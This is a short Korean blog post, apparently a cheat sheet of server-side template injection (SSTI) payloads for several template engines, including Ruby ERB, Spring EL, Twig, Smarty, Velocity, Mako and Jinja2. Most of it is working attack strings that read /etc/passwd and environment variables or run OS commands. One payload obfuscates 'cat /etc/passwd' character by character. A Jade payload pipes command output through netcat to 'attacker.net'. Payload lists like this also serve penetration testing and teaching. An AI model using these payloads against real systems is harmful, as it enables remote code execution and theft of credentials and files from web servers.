WEB
SSTI 팁
J1W0N
2020. 3. 12. 16:59
728x90
SSTI 맵이다.
Ruby
Basic
<%= 7 * 7 %>/etc/passwd 가져오기
<%= File.open('/etc/passwd').read %>List files and directories
<%= Dir.entries('/') %>Java
Basic
${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}시스템 환경변수 가져오기
${T(java.lang.System).getenv()}/etc/passwd 가져오기
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}Twig
Basic
{{7*7}}
{{7*'7'}} #would result in 49Smarty
{php}echo `id`;{/php}Freemarker
${3*3}
#{3*3}Jade/ Codepen
- var x = root.process
- x = x.mainModule.require
- x = x('child_process')
= x.exec('id | nc attacker.net 80')Velocity
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#endMako
<%
import os
x=os.popen('id').read()
%>
${x}Jinja2
{{7*'7'}} #result : 7777777Jinjava
{{'a'.toUpperCase()}} #would result in 'A'참조
https://medium.com/server-side-template-injection/server-side-template-injection-faf88d0c7f34